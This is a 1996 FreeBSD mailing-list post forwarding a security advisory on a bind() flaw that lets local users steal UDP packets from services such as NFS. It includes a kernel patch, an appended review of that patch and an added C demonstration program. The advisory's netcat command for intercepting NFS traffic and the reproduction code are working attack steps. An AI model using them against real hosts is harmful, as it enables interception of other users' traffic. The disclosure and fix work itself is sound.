From owner-freebsd-hackers Wed Jan 31 14:15:12 1996
Return-Path: owner-hackers
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id OAA16878 for hackers-outgoing; Wed, 31 Jan 1996 14:15:12 -0800 (PST)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id OAA16871 for ; Wed, 31 Jan 1996 14:15:06 -0800 (PST)
Received: by gvr.win.tue.nl (8.6.10/1.53) id XAA15623; Wed, 31 Jan 1996 23:14:59 +0100
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199601312214.XAA15623@gvr.win.tue.nl>
Subject: bind() bug in almost all OS'es
To: FreeBSD-hackers@freefall.FreeBSD.org (FreeBSD-hackers)
Date: Wed, 31 Jan 1996 23:14:58 +0100 (MET)
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-hackers@FreeBSD.ORG
Precedence: bulk

I posted this on security. This is severe in my eyes. Fortunately there is
still the concept of reserved ports, but it does not help sniffing nfs
ports :-(

-Guido

Aleph's K-Rad GECOS Field wrote:
> From owner-freebsd-security@freefall.freebsd.org Wed Jan 31 16:00:48 1996
> X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f
> Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST)
> From: "Aleph's K-Rad GECOS Field"
> To: linux-security@tarsier.cv.nrao.edu
> cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com,
>     best-of-security@suburbia.net
> Subject: BoS: bind() Security Problems
> Message-ID:
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Reply-To: nobody@mail.uu.net
> Sender: owner-security@FreeBSD.org
> Precedence: bulk
>
>
> System Call:                bind()
> Affected Operating System:  Linux, SunOS, FreeBSD, BSDI, Ultrix
>                             Probably others.
> Requirement:                account on system.
> Security Compromise:        Stealing packets from nfsd, yppasswd, ircd, etc.
> Credits:                    *Hobbit*
>                             bitblt
>                             Aleph One
> Synopsis:                   bind() does not properly check to make sure
>                             there is not a socket already bound to
>                             INADDR_ANY on the same port when binding to
>                             a specific address.
>
> On most systems, a combination of setting the SO_REUSEADDR
> socket option, and a call to bind() allows any process to bind to
> a port to which a previous process has bound with INADDR_ANY. This
> allows a user to bind to the specific address of a server bound to
> INADDR_ANY on an unprivileged port, and steal its udp packets/tcp
> connection.
>
> Exploit:
>
> Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz
> Make sure an nfs server is running:
>
> w00p% netstat -a | grep 2049
> udp        0      0  *.2049                 *.*                    LISTEN
>
> Run netcat:
>
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...
>
> Wait for packets to arrive.
>
> Fix:
>
> Linux: A patch has been sent to Linus and Alan Cox. It should be
> included with 1.3.60. My original patch (included below) allows for
> binds from the same uid, as some virtual hosting software like modified
> httpds, and ftpds, may break otherwise.
>
> Alan didn't like this, so all binds to the same port will
> not be allowed in newer kernels. You should be able to easily adapt
> this patch or Alan's patch to 1.2.13 without much trouble.
>
> Others: Pray to your vendors.
> > --- begin patch --- > > > diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c > --- linux-1.3.57/net/ipv4/af_inet.c Mon Dec 25 20:03:01 1995 > +++ linux/net/ipv4/af_inet.c Tue Jan 16 19:46:28 1996 > @@ -46,6 +46,8 @@ > * Germano Caronni : Assorted small races. > * Alan Cox : sendmsg/recvmsg basic support. > * Alan Cox : Only sendmsg/recvmsg now supported. > + * Aleph One : Rogue processes could steal packets > + * from processes bound to INADDR_ANY. > * > * This program is free software; you can redistribute it and/or > * modify it under the terms of the GNU General Public License > @@ -899,6 +901,12 @@ > > if (sk2->num != snum) > continue; /* more than one */ > + if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) && > + current->euid != sk2->socket->inode->i_uid) > + { > + sti(); > + return(-EADDRINUSE); > + } > if (sk2->rcv_saddr != sk->rcv_saddr) > continue; /* socket per slot ! -FB */ > if (!sk2->reuse || sk2->state==TCP_LISTEN) > > > Aleph One / aleph1@underground.org > http://underground.org/ > KeyID 1024/948FD6B5 > Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 > > > >
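Review bot: the uid check added in the af_inet.c hunk at @@ -899,6 +901,12 @@ only fires when one of the two sockets is bound to the wildcard address (`sk2->rcv_saddr == 0 || sk->rcv_saddr == 0`), so two processes with different uids can still both bind the same specific address and port: that case falls through to the pre-existing `if (!sk2->reuse || sk2->state==TCP_LISTEN)` test, which lets the second bind through whenever the first socket has SO_REUSEADDR set and is not a TCP listener, which for UDP is the packet-stealing situation the advisory describes. Consider extending the new condition so the uid comparison also covers equal addresses, e.g. `if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0 || sk2->rcv_saddr == sk->rcv_saddr) && current->euid != sk2->socket->inode->i_uid)`. Two smaller points on the same hunk: it compares a process credential (`current->euid`) against the owner recorded on the existing socket's inode (`sk2->socket->inode->i_uid`), and a comment should state why that is the right owner to compare against, since a daemon that changed uid after creating its socket is judged by the inode's owner rather than its current euid; and the `sti()` on the new early-return path deserves a comment saying it restores the interrupt state the caller disabled, as the matching cli() is not visible in the hunk.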
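The bind() interaction the advisory describes, reproduced as an added example. This is not Aleph One's code, netcat, or the kernel patch; it is a stand-alone C program that plays both roles in one process: a "victim" UDP socket bound to INADDR_ANY on a kernel-chosen port, and an "attacker" socket that sets SO_REUSEADDR and binds the loopback address on the same port. The loopback address, the ephemeral port and the two-sockets-in-one-process setup are assumptions made for the demonstration (so the per-uid part of the fix is not exercised here); the function reports whether the second bind is refused, and with what errno.

```c
/* Added example, not part of the original advisory or patch.
 * Reproduces the wildcard-vs-specific bind() overlap with two UDP sockets
 * in one process and reports whether the second bind is allowed. */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

static int set_reuse(int fd, int on)
{
    return setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof on);
}

/* victim_reuse / attacker_reuse: whether each side sets SO_REUSEADDR.
 * Returns 1 if the attacker's bind to 127.0.0.1:<victim port> succeeded,
 * 0 if the kernel refused it (*err holds errno), -1 on setup failure. */
int try_steal(int victim_reuse, int attacker_reuse, int *err)
{
    int result = -1;
    struct sockaddr_in a;
    socklen_t alen = sizeof a;
    int victim = socket(AF_INET, SOCK_DGRAM, 0);
    int attacker = socket(AF_INET, SOCK_DGRAM, 0);

    *err = 0;
    if (victim < 0 || attacker < 0)
        goto out;

    /* Victim: the "server", bound to the wildcard address; port 0 lets
     * the kernel pick an unprivileged port (assumed for the demo). */
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_ANY);
    a.sin_port = 0;
    if (set_reuse(victim, victim_reuse) < 0)
        goto out;
    if (bind(victim, (struct sockaddr *)&a, sizeof a) < 0)
        goto out;
    if (getsockname(victim, (struct sockaddr *)&a, &alen) < 0)
        goto out;                       /* a.sin_port now holds the port */

    /* Attacker: same port, but the specific (loopback) address. */
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (set_reuse(attacker, attacker_reuse) < 0)
        goto out;
    if (bind(attacker, (struct sockaddr *)&a, sizeof a) == 0) {
        result = 1;                     /* overlap allowed: packets for
                                           127.0.0.1 now land here */
    } else {
        *err = errno;
        result = 0;                     /* overlap refused */
    }

out:
    if (victim >= 0)
        close(victim);
    if (attacker >= 0)
        close(attacker);
    return result;
}

int main(void)
{
    int err;
    int r = try_steal(0, 1, &err);
    printf("victim without SO_REUSEADDR: attacker bind %s%s\n",
           r == 1 ? "succeeded" : "refused",
           r == 0 ? strerror(err) : "");
    r = try_steal(1, 1, &err);
    printf("victim with SO_REUSEADDR:    attacker bind %s\n",
           r == 1 ? "succeeded" : "refused");
    return 0;
}
```

On a current Linux kernel the first call is refused with EADDRINUSE, which is the behaviour the advisory asks for; the second succeeds because both sockets carry SO_REUSEADDR, so a UDP service that sets SO_REUSEADDR on its wildcard socket reopens exactly the overlap described above for any other local user. Run it as an unprivileged user; no root is needed since the port is unprivileged.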